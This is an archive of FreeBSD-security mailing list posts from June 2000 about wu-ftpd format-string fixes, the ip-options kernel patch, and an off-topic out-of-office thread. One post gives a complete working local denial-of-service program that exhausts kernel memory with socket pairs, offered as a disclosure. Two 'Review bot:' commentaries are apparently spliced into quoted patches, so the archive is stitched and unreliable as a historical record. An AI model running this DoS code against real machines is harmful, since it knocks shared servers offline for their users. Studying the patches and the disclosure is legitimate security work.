From: "Herbert J. McNew" X-Sender: herb@molybdenum.systems.cais.net To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe I missed it, but does anyone have an exploit for this yet? I have a solution (that isn't a kernel recompile) that I'd like to test, but have no way of doing so without an exploit. Thanks. _____________________ Herb McNew Systems Administrator CAIS Internet (703) 247-6270 herb@cais.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 10:13:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0085337C3B5 for ; Fri, 23 Jun 2000 10:13:32 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA49665; Fri, 23 Jun 2000 13:13:19 -0400 (EDT) (envelope-from wollman) Date: Fri, 23 Jun 2000 13:13:19 -0400 (EDT) 
From: Garrett Wollman
Message-Id: <200006231713.NAA49665@khavrinen.lcs.mit.edu>
To: Mike Silbersack
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994
In-Reply-To:
References: <4.2.2.20000622201823.0479a690@mail.sentex.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

< said:

> (Does anyone actually still run it?)

Absolutely.

Here's a patch (mangled by cut&paste) which hacks around the problem. Stick it in patches/patch-ftpcmd.y-MIT-IS for best results. This hack was put together by MIT Information Systems as a stopgap until the wu-ftpd developers come up with an official fix.

*** src/ftpcmd.y.old Fri Jun 23 00:44:11 2000 - --- src/ftpcmd.y Fri Jun 23 00:48:36 2000 *************** *** 1460,1469 **** - --- 1460,1474 ---- if (wu_getline(cbuf, sizeof(cbuf) - 1, stdin) == NULL) { (void) alarm(0); reply(221, "You could at least say goodbye."); dologout(0); } + else if (strchr(cbuf, '%')) { + (void) alarm(0); + reply(421, "The command line contained a %% character."); + dologout(0); + } #ifndef IGNORE_NOOP (void) alarm(0); #endif if ((cp = strchr(cbuf, '\r'))) { *cp++ = '\n';

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE5U5qlI+eG6b7tlG4RAqNBAJ9dLOLVO3hBhNM22gBMtrJYttCO0ACgobsD
E9wtuVVqPIpjNoBO0hY3Dqo=
=fbsD
-----END PGP SIGNATURE-----

From owner-freebsd-security Fri Jun 23 12:52:28 2000
Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id 821B437BA30 for ; Fri, 23 Jun 2000 12:52:20 -0700 (PDT) (envelope-from mike@sentex.ca)
Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id
PAA39834; Fri, 23 Jun 2000 15:52:19 -0400 (EDT) (envelope-from mike@sentex.ca)
Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id PAA28284; Fri, 23 Jun 2000 15:52:15 -0400 (EDT)
Message-Id: <3.0.5.32.20000623154848.02d2d6c0@marble.sentex.ca>
X-Sender: mdtpop@marble.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Fri, 23 Jun 2000 15:48:48 -0400
To: Garrett Wollman
From: Mike Tancsa
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <200006231713.NAA49665@khavrinen.lcs.mit.edu>
References: <4.2.2.20000622201823.0479a690@mail.sentex.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

What about

--enable-paranoid

as part of the config? As so much seems to be related to the site exec command, perhaps it's best to just disable this?

---Mike

At 01:13 PM 6/23/00 -0400, Garrett Wollman wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>< said:
>
>> (Does anyone actually still run it?)
>
>Absolutely.
>
>Here's a patch (mangled by cut&paste) which hacks around the problem.
>Stick it in patches/patch-ftpcmd.y-MIT-IS for best results. This hack
>was put together by MIT Information Systems as a stopgap until the
>wu-ftpd developers come up with an official fix.
>
>*** src/ftpcmd.y.old Fri Jun 23 00:44:11 2000 >- --- src/ftpcmd.y Fri Jun 23 00:48:36 2000 >*************** >*** 1460,1469 **** >- --- 1460,1474 ---- > if (wu_getline(cbuf, sizeof(cbuf) - 1, stdin) == NULL) { > (void) alarm(0); > reply(221, "You could at least say goodbye."); > dologout(0); > } >+ else if (strchr(cbuf, '%')) { >+ (void) alarm(0); >+ reply(421, "The command line contained a %% character."); >+ dologout(0); >+ } > #ifndef IGNORE_NOOP > (void) alarm(0); > #endif > if ((cp = strchr(cbuf, '\r'))) { > *cp++ = '\n';
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.0.1 (FreeBSD)
>Comment: For info see http://www.gnupg.org
>
>iD8DBQE5U5qlI+eG6b7tlG4RAqNBAJ9dLOLVO3hBhNM22gBMtrJYttCO0ACgobsD
>E9wtuVVqPIpjNoBO0hY3Dqo=
>=fbsD
>-----END PGP SIGNATURE-----
>

------------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications
mike@sentex.net
Cambridge, Ontario Canada
www.sentex.net

From owner-freebsd-security Fri Jun 23 13:34:46 2000
Received: from erouter0.it-datacntr.louisville.edu (erouter0.it-datacntr.louisville.edu [136.165.1.36]) by hub.freebsd.org (Postfix) with ESMTP id 6884F37B8B9 for ; Fri, 23 Jun 2000 13:34:37 -0700 (PDT) (envelope-from k.stevenson@louisville.edu)
Received: from osaka.louisville.edu (osaka.louisville.edu [136.165.1.114]) by erouter0.it-datacntr.louisville.edu (Postfix) with ESMTP id 6E2E8251F3; Fri, 23 Jun 2000 16:34:12 -0400 (EDT)
Received: by osaka.louisville.edu (Postfix, from userid 15) id 77DCC18616; Fri, 23 Jun 2000 16:34:11 -0400 (EDT)
Date: Fri, 23 Jun 2000 16:34:11 -0400
From: Keith Stevenson
To: Mike Tancsa
Cc: Garrett Wollman , freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994
Message-ID: <20000623163411.A1412@osaka.louisville.edu>
References: <4.2.2.20000622201823.0479a690@mail.sentex.net> <200006231713.NAA49665@khavrinen.lcs.mit.edu> <3.0.5.32.20000623154848.02d2d6c0@marble.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <3.0.5.32.20000623154848.02d2d6c0@marble.sentex.ca>; from mike@sentex.ca on Fri, Jun 23, 2000 at 03:48:48PM -0400

On Fri, Jun 23, 2000 at 03:48:48PM -0400, Mike Tancsa wrote:
> What about
>
> --enable-paranoid
>
> as part of the config? As so much seems to be related to the site exec
> command, perhaps it's best to just disable this?

While I'm all for actually fixing the problems in the code, I've found the --enable-paranoid option to be a good one. I've been tinkering around with the exploit and the paranoid option seems to defend against it. I don't think that any of my users will miss the SITE EXEC commands. --enable-paranoid probably should be added to the port build.
Regards,
--Keith Stevenson--

--
Keith Stevenson
System Programmer - Data Center Services - University of Louisville
k.stevenson@louisville.edu
GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE

From owner-freebsd-security Fri Jun 23 15:16: 2 2000
Received: from kcmso1.proxy.att.com (kcmso1.att.com [192.128.133.69]) by hub.freebsd.org (Postfix) with ESMTP id 4663037B78D for ; Fri, 23 Jun 2000 15:15:46 -0700 (PDT) (envelope-from fastd@att.com)
Received: from gab200r1.ems.att.com ([135.37.94.32]) by kcmso1.proxy.att.com (AT&T IPNS/MSO-2.2) with ESMTP id SAA11484 for ; Fri, 23 Jun 2000 18:15:38 -0400 (EDT)
Received: from mo3980bh2.ems.att.com by gab200r1.ems.att.com (8.8.8+Sun/ATTEMS-1.4.1 sol2) id SAA13777; Fri, 23 Jun 2000 18:17:12 -0400 (EDT)
Received: by mo3980bh2.ems.att.com with Internet Mail Service (5.5.2650.21) id ; Fri, 23 Jun 2000 17:15:37 -0500
Message-ID: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com>
From: "Fast, Daniel H (Danny), SITS"
Cc: security@FreeBSD.ORG
Subject: Out of Office?
Date: Fri, 23 Jun 2000 17:15:35 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain; charset="iso-8859-1"

I have Outlook [no flames] but I am leaving...... and want to turn my out of office on..... will that respond to the entire list I am on?

D~y

From owner-freebsd-security Fri Jun 23 15:24:45 2000
Received: from snafu.adept.org (adsl-63-201-63-44.dsl.snfc21.pacbell.net [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id EA21037B649 for ; Fri, 23 Jun 2000 15:24:40 -0700 (PDT) (envelope-from mike@adept.org)
Received: by snafu.adept.org (Postfix, from userid 1000) id 884AF9EE01; Fri, 23 Jun 2000 15:24:32 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by snafu.adept.org (Postfix) with ESMTP id 7E4619B001; Fri, 23 Jun 2000 15:24:32 -0700 (PDT)
Date: Fri, 23 Jun 2000 15:24:32 -0700 (PDT)
From: Mike
To: "Fast, Daniel H (Danny), SITS"
Cc: security@FreeBSD.ORG
Subject: Re: Out of Office?
In-Reply-To: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

If properly configured, I believe it should send to the
From: (which would be the poster, not the list) not the Reply-To: (the list), and it should only do that once. I don't have Outlook experience, but that's the way the vacation program has worked for me in the past (similar unix utility).

-mrh

On Fri, 23 Jun 2000, Fast, Daniel H (Danny), SITS wrote:

> I have outlook [no flames] but I am leaving......and want to turn my out of
> office on.....will that respond to the entire list I am on?
>
> D~y
>

From owner-freebsd-security Fri Jun 23 15:59:23 2000
Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id CEA8437BA22 for ; Fri, 23 Jun 2000 15:59:19 -0700 (PDT) (envelope-from hart@iserver.com)
Received: by gatekeeper.veriohosting.com; Fri, 23 Jun 2000 16:58:48 -0600 (MDT)
Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma029241; Fri, 23 Jun 00 16:58:36 -0600
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id QAA09076; Fri, 23 Jun 2000 16:58:35 -0600 (MDT)
Date: Fri, 23 Jun 2000 16:58:35 -0600 (MDT)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
To: mike@adept.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Out of Office?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Fri, 23 Jun 2000, Mike wrote:

> If properly configured, I believe it should send to the
> From: (which would
> be the poster, not the list) not the Reply-To: (the list), and it should
> only do that once.

Don't even reply once to senders of mailing list messages. Do you think they really care that you're out of the office?

Paul Hart

--
Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc.
hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/

From owner-freebsd-security Fri Jun 23 16: 3:35 2000
Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id B785437BA5E for ; Fri, 23 Jun 2000 16:03:22 -0700 (PDT) (envelope-from brad@testbed.baileylink.net)
Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id SAA48401; Fri, 23 Jun 2000 18:03:54 -0500 (CDT) (envelope-from brad)
Date: Fri, 23 Jun 2000 18:03:54 -0500
From: Brad Guillory
To: "Fast, Daniel H (Danny), SITS"
Cc: security@FreeBSD.ORG
Subject: Re: Out of Office?
Message-ID: <20000623180353.A47342@baileylink.net>
References: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com>; from fastd@att.com on Fri, Jun 23, 2000 at 05:15:35PM -0500

Just make a rule (or whatever they call them on Exchange servers) that checks the To: field, then reply to messages which match your valid email addresses. Good luck.

BMG

On Fri, Jun 23, 2000 at 05:15:35PM -0500, Fast, Daniel H (Danny), SITS wrote:
> I have outlook [no flames] but I am leaving......and want to turn my out of
> office on.....will that respond to the entire list I am on?
>
> D~y
>

--
  __O      | Information wants to be free!
|   __O   Bike
_-\<,_    | FreeBSD:The Power to Serve (easily)    | _-\<,_   to
(_)/ (_)  | OpenBSD:The Power to Serve (securely)  | (_)/ (_) Work

From owner-freebsd-security Fri Jun 23 18:33: 8 2000
Received: from smtp03.246.ne.jp (smtp03.246.ne.jp [210.253.192.37]) by hub.freebsd.org (Postfix) with SMTP id 5DA9B37B733 for ; Fri, 23 Jun 2000 18:33:01 -0700 (PDT) (envelope-from y-koga@jp.FreeBSD.org)
Received: (qmail 13482 invoked by alias); 24 Jun 2000 10:32:53 +0900
Message-ID: <20000624013253.13481.qmail@smtp.246.ne.jp>
Received: (qmail 13449 invoked from network); 24 Jun 2000 10:32:51 +0900
Received: from tp4hr247.246.ne.jp (HELO localhost) (210.253.193.247) by smtp.246.ne.jp with SMTP; 24 Jun 2000 10:32:51 +0900
To: wollman@khavrinen.lcs.mit.edu
Cc: silby@silby.com, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994
In-Reply-To: <200006231713.NAA49665@khavrinen.lcs.mit.edu>
References: <4.2.2.20000622201823.0479a690@mail.sentex.net> <200006231713.NAA49665@khavrinen.lcs.mit.edu>
X-Mailer: Mew version 1.94.2 on Emacs 19.28 / Mule 2.3 (SUETSUMUHANA)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Date: Sat, 24 Jun 2000 10:32:21 +0900
From: Koga Youichirou
X-Dispatcher: imput version 20000228(IM140)

Garrett Wollman :
> Here's a patch (mangled by cut&paste) which hacks around the problem.

The Debian team has already released a fixed package. A patch is available from:

http://security.debian.org/dists/potato/updates/main/source/wu-ftpd_2.6.0-5.1.diff.gz

Then I checked it and I found that there is some other undesirable code in ftpd.c. Probably this code does not lead to a security flaw, but I think that it should be corrected.

The following patch corrects it (incl. a part of Debian's patch), and I have sent it to the wu-ftpd development team.

Index: ftpcmd.y =================================================================== RCS file: /usr/cvs/src/wu-ftpd/src/ftpcmd.y,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 ftpcmd.y --- ftpcmd.y 1999/10/21 11:50:51 1.1.1.1 +++ ftpcmd.y 2000/06/23 08:19:30 @@ -1926,13 +1926,13 @@ } if (!maxfound) maxlines = defmaxlines; - lreply(200, cmd); + lreply(200, "%s", cmd); while (fgets(buf, sizeof buf, cmdf)) { size_t len = strlen(buf); if (len > 0 && buf[len - 1] == '\n') buf[--len] = '\0'; - lreply(200, buf); + lreply(200, "%s", buf); if (maxlines <= 0) ++lines; else if (++lines >= maxlines) { Index: ftpd.c =================================================================== RCS file: /usr/cvs/src/wu-ftpd/src/ftpd.c,v retrieving revision 1.1.1.1.2.10 diff -u -r1.1.1.1.2.10 ftpd.c --- ftpd.c 2000/03/17 02:01:57 1.1.1.1.2.10 +++ ftpd.c 2000/06/23 08:47:21 @@ -2012,9 +2012,9 @@ s = strsep(&cp, "\n"); if (cp == NULL || *cp == '\0') break; - lreply(331, s); + lreply(331, "%s", s); } - reply(331, s); + reply(331, "%s", s); } else { #endif @@ -2495,7 +2495,7 @@ #ifdef BSD_AUTH if (ext_auth) { if ((salt = check_auth(the_user, passwd))) { - reply(530, salt); + reply(530, "%s", salt); #ifdef LOG_FAILED /* 27-Apr-93 EHK/BM */ syslog(LOG_INFO, "failed login from %s", remoteident);
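Review bot: In the @@ -2495 hunk, `reply(530, salt)` hands the string returned by `check_auth()` to `reply()` as its format argument, and `reply()` is a printf-style function (the @@ -3160 hunk calls it as `reply(230, "User %s logged in.%s", ...)`), so the change to `reply(530, "%s", salt)` is right even though `salt` is not taken straight from the client: any `%` in a message coming back from the authentication backend would otherwise be interpreted as a conversion. Every hunk in this patch has the same shape, a caller-supplied string in the format position; declaring `reply()` and `lreply()` with the compiler's printf format attribute would make the remaining non-literal callers show up as warnings instead of depending on a hand audit of ftpd.c.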
@@ -3160,7 +3160,7 @@ reply(230, "User %s logged in.%s", pw->pw_name, guest ? " Access restrictions apply." : ""); sprintf(proctitle, "%s: %s", remotehost, pw->pw_name); - setproctitle(proctitle); + setproctitle("%s", proctitle); if (logging) syslog(LOG_INFO, "FTP LOGIN FROM %s, %s", remoteident, pw->pw_name); /* H* mod: if non-anonymous user, copy it to "authuser" so everyone can @@ -5908,7 +5908,7 @@ remotehost[sizeof(remotehost) - 1] = '\0'; sprintf(proctitle, "%s: connected", remotehost); - setproctitle(proctitle); + setproctitle("%s", proctitle); wu_authenticate(); /* Create a composite source identification string, to improve the logging @@ -6318,7 +6318,7 @@ dirlist = ftpglob(whichfiles); sdirlist = dirlist; /* save to free later */ if (globerr != NULL) { - reply(550, globerr); + reply(550, "%s", globerr); goto globfree; } else if (dirlist == NULL) {

Regards,

--
Koga, Youichirou

From owner-freebsd-security Fri Jun 23 19: 1:54 2000
Received: from mics.co.za (saturn.mics.co.za [196.34.165.130]) by hub.freebsd.org (Postfix) with ESMTP id B62A637B778 for ; Fri, 23 Jun 2000 19:01:42 -0700 (PDT) (envelope-from christiaan@mics.co.za)
Received: from vision.boxlet.co.za ([196.34.165.140] helo=mics.co.za ident=vision) by mics.co.za with esmtp (Exim 3.13 #1) id 135fGe-0003p6-00 for security@freebsd.org; Sat, 24 Jun 2000 04:01:56 +0200
Message-ID: <39541671.84FFC647@mics.co.za>
Date: Sat, 24 Jun 2000 04:01:22 +0200
From: Christiaan Rademan
Organization: MICS
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: security@freebsd.org
Subject: Security Bug.
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi.

I am hosting a shell server for my dialup users at an ISP. We have one slight problem: there is a DoS attack that affects FBSD 4.0-STABLE locally, and other FBSD releases. If the DoS attack is run locally, the system stops accepting connections, then dies off.

Here is the bug... :-) If there is a patch already, please post it here...

#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFERSIZE 204800   /* 200 KB requested for each socket buffer */

extern int main(void)
{
    int p[2], i;
    char crap[BUFFERSIZE];  /* never initialised; the contents do not matter */

    /* Keep creating socket pairs without ever closing them, enlarge both
     * buffers on both ends, and fill them so each pair pins its buffers in
     * kernel memory.  The loop only ends when socketpair() itself fails. */
    while (1) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
            break;
        i = BUFFERSIZE;
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        fcntl(p[0], F_SETFL, O_NONBLOCK);  /* non-blocking so a full buffer does not stall the loop */
        fcntl(p[1], F_SETFL, O_NONBLOCK);
        write(p[0], crap, BUFFERSIZE);
        write(p[1], crap, BUFFERSIZE);
    }
    exit(0);
}

From owner-freebsd-security Fri Jun 23 20:40:43 2000
Received: from ns2.intertek.net (ns2.intertek.net [209.83.158.3]) by hub.freebsd.org (Postfix) with ESMTP id 4D64D37B7F9 for ; Fri, 23 Jun 2000 20:40:35 -0700 (PDT) (envelope-from chancedj@intertek.net)
Received: from satan (oflil078.intertek.net [209.83.158.78]) by ns2.intertek.net (8.9.3/8.9.3) with SMTP id WAA14361 for ; Fri, 23 Jun 2000 22:36:58 -0500
Message-ID: <016901bfdd8e$5a96f3c0$0200000a@gateway.intertek.net>
From: "Daryl Chance"
To: "FreeBSD Security2"
References:
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
Date: Fri, 23 Jun 2000 22:43:25 -0500
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600

Todd:

I tried updating my dialup box and got the same thing. A quick vi on the file and I noticed that there were ^M's. dostounix, checked again, and all was gone... patched, and it patched cleanly. I figured you've probably checked there already, but it never hurts to ask :).

Daryl

----- Original Message -----
From: "Todd Backman"
To:
Sent: Thursday, June 22, 2000 7:01 PM
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options

>
> So, upon following the instructions for patch on the SA (including DL'ing
> the patch from the ftp site) I get the following:
>
> **** START ****
>
> stuff# patch -p < ip-options.diff
> Hmm... Looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |Index: ip_icmp.c
> |===================================================================
> |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v
> |retrieving revision 1.39
> |diff -u -r1.39 ip_icmp.c
> |--- ip_icmp.c 2000/01/28 06:13:09 1.39
> |+++ ip_icmp.c 2000/06/08 15:26:39
> --------------------------
> Patching file ip_icmp.c using Plan A...
> Hunk #1 failed at 662.
> 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej
> Hmm... The next patch looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |Index: ip_input.c
> |===================================================================
> |RCS file: /ncvs/src/sys/netinet/ip_input.c,v
> |retrieving revision 1.130
> |diff -u -r1.130 ip_input.c
> |--- ip_input.c 2000/02/23 20:11:57 1.130
> |+++ ip_input.c 2000/06/08 15:25:46
> --------------------------
> Patching file ip_input.c using Plan A...
> Hunk #1 failed at 1067.
> Hunk #2 failed at 1178.
> 2 out of 2 hunks failed--saving rejects to ip_input.c.rej
> Hmm... The next patch looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |Index: ip_output.c
> |===================================================================
> |RCS file: /ncvs/src/sys/netinet/ip_output.c,v
> |retrieving revision 1.99
> |diff -u -r1.99 ip_output.c
> |--- ip_output.c 2000/03/09 14:57:15 1.99
> |+++ ip_output.c 2000/06/08 15:27:08
> --------------------------
> Patching file ip_output.c using Plan A...
> Hunk #1 failed at 1302.
> 1 out of 1 hunks failed--saving rejects to ip_output.c.rej
> done
>
> **** FINISH ****
>
> Can anyone hit me with the cluestick?
>
> Thanks.
>
> - Todd
>
>
> On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote:
>
> > # cd /usr/src/sys/netinet
> > # patch -p < /path/to/patch_or_advisory
> >
> > Index: ip_icmp.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > > retrieving revision 1.39 > > diff -u -r1.39 ip_icmp.c > > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > > +++ ip_icmp.c 2000/06/08 15:26:39 > > @@ -662,8 +662,11 @@ > > if (opt == IPOPT_NOP) > > len = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + break; > > len = cp[IPOPT_OLEN]; > > - if (len <= 0 || len > cnt) > > + if (len < IPOPT_OLEN + sizeof(*cp) || > > + len > cnt) > > break; > > } > > /* > > Index: ip_input.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > > retrieving revision 1.130 > > diff -u -r1.130 ip_input.c > > --- ip_input.c 2000/02/23 20:11:57 1.130 > > +++ ip_input.c 2000/06/08 15:25:46 > > @@ -1067,8 +1067,12 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > > + goto bad; > > + } > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= 0 || optlen > cnt) { > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > > code = &cp[IPOPT_OLEN] - (u_char *)ip; > > goto bad; > > }
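Review bot: In the ip_input.c @@ -1067 hunk, the new `cnt < IPOPT_OLEN + sizeof(*cp)` test is what keeps `optlen = cp[IPOPT_OLEN]` from reading past the end of the option area when only the type byte is left, and raising the lower bound from `optlen <= 0` to `optlen < IPOPT_OLEN + sizeof(*cp)` is needed because a non-NOP option of length 1 has no length byte at all and the old check let it through. Both comparisons now mix an `int` with a `size_t` (`sizeof(*cp)`), so they are evaluated unsigned; that is safe here because `optlen` is loaded from `cp`, which the `(u_char *)ip` subtraction shows to be a `u_char *`, and so is never negative, but a one-line comment to that effect would spare the next reader the same check. The same guard is added by hand in ip_icmp.c, ip_input.c and ip_output.c (with `break` in one and `goto bad` in the others); a single shared option-walking helper would stop the three copies from drifting apart again.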
> > @@ -1174,6 +1178,10 @@ > > break; > > > > case IPOPT_RR: > > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > + goto bad; > > + } > > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > goto bad; > > Index: ip_output.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > > retrieving revision 1.99 > > diff -u -r1.99 ip_output.c > > --- ip_output.c 2000/03/09 14:57:15 1.99 > > +++ ip_output.c 2000/06/08 15:27:08 > > @@ -1302,8 +1302,10 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + goto bad; > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= IPOPT_OLEN || optlen > cnt) > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > > goto bad; > > } > > switch (opt) {
> >
>

From owner-freebsd-security Fri Jun 23 20:42:44 2000
Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 0A75837BB75 for ; Fri, 23 Jun 2000 20:42:15 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk)
Received: from strontium.scientia.demon.co.uk ([192.168.91.36] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.15 #1) id 135dGX-000CRM-00; Sat, 24 Jun 2000 00:53:41 +0100
Received: (from ben) by strontium.scientia.demon.co.uk (Exim 3.15 #1) id 135dGW-0005Cu-00; Sat, 24 Jun 2000 00:53:40 +0100
Date: Sat, 24 Jun 2000 00:53:40 +0100
From: Ben Smithurst
To: Mike
Cc: "Fast, Daniel H (Danny), SITS" , security@FreeBSD.ORG
Subject: Re: Out of Office?
Message-ID: <20000624005340.Y57917@strontium.scientia.demon.co.uk>
References: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Nm48CqPeykZpOG4/"
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To:

--Nm48CqPeykZpOG4/
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Mike wrote:

> If properly configured, I believe it should send to the
> From: (which would
> be the poster, not the list) not the Reply-To: (the list), and it should
> only do that once.

I think you'll find the FreeBSD list admin has Clue, so the Reply-To on these lists is *NOT* set to the list address. Thank god. Vacation programs should only respond to personal mail -- when I post to a list I do *NOT* want god only knows how many people's vacation crap in my inbox a few minutes later. By 'personal' I mean either 'To' or 'Cc' contains your mail address; that's how vacation(1) works, I believe.

--
Ben Smithurst / ben@scientia.demon.co.uk / PGP: 0x99392F7D

--Nm48CqPeykZpOG4/
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
MessageID: N16RO2sp9s3GCAp21qsb3RJktlLtwLJ3

iQCVAwUBOVP4hCsPVtiZOS99AQEx7wQAo7qQeMAq9Gc8csuh1KeSHFt/ePN6a+JI
GTzeHhDlWg9f2yHhCEI7ErAzcbwHpYOoIHu8BKdCeFQfRbcuxa+GAAO+t65Nh0eQ
I0ks2s0UjAGvE5wLYQ/7Xz7JZFFBuk23+Km7MYu56l0srHZvIT3MEoTaJ2Qo99IF
pVzKzpio1bA=
=vr3F
-----END PGP SIGNATURE-----

--Nm48CqPeykZpOG4/--

From owner-freebsd-security Fri Jun 23 21:13:55 2000
Received: from sivka.rdy.com (sivka.rdy.com [207.33.166.86]) by hub.freebsd.org (Postfix) with ESMTP id ED06837B507 for ; Fri, 23 Jun 2000 21:13:39 -0700 (PDT) (envelope-from dima@rdy.com)
Received: (from dima@localhost) by sivka.rdy.com (8.9.3/8.9.3) id VAA82687; Fri, 23 Jun 2000 21:11:46 -0700 (PDT) (envelope-from dima)
Message-Id: <200006240411.VAA82687@sivka.rdy.com>
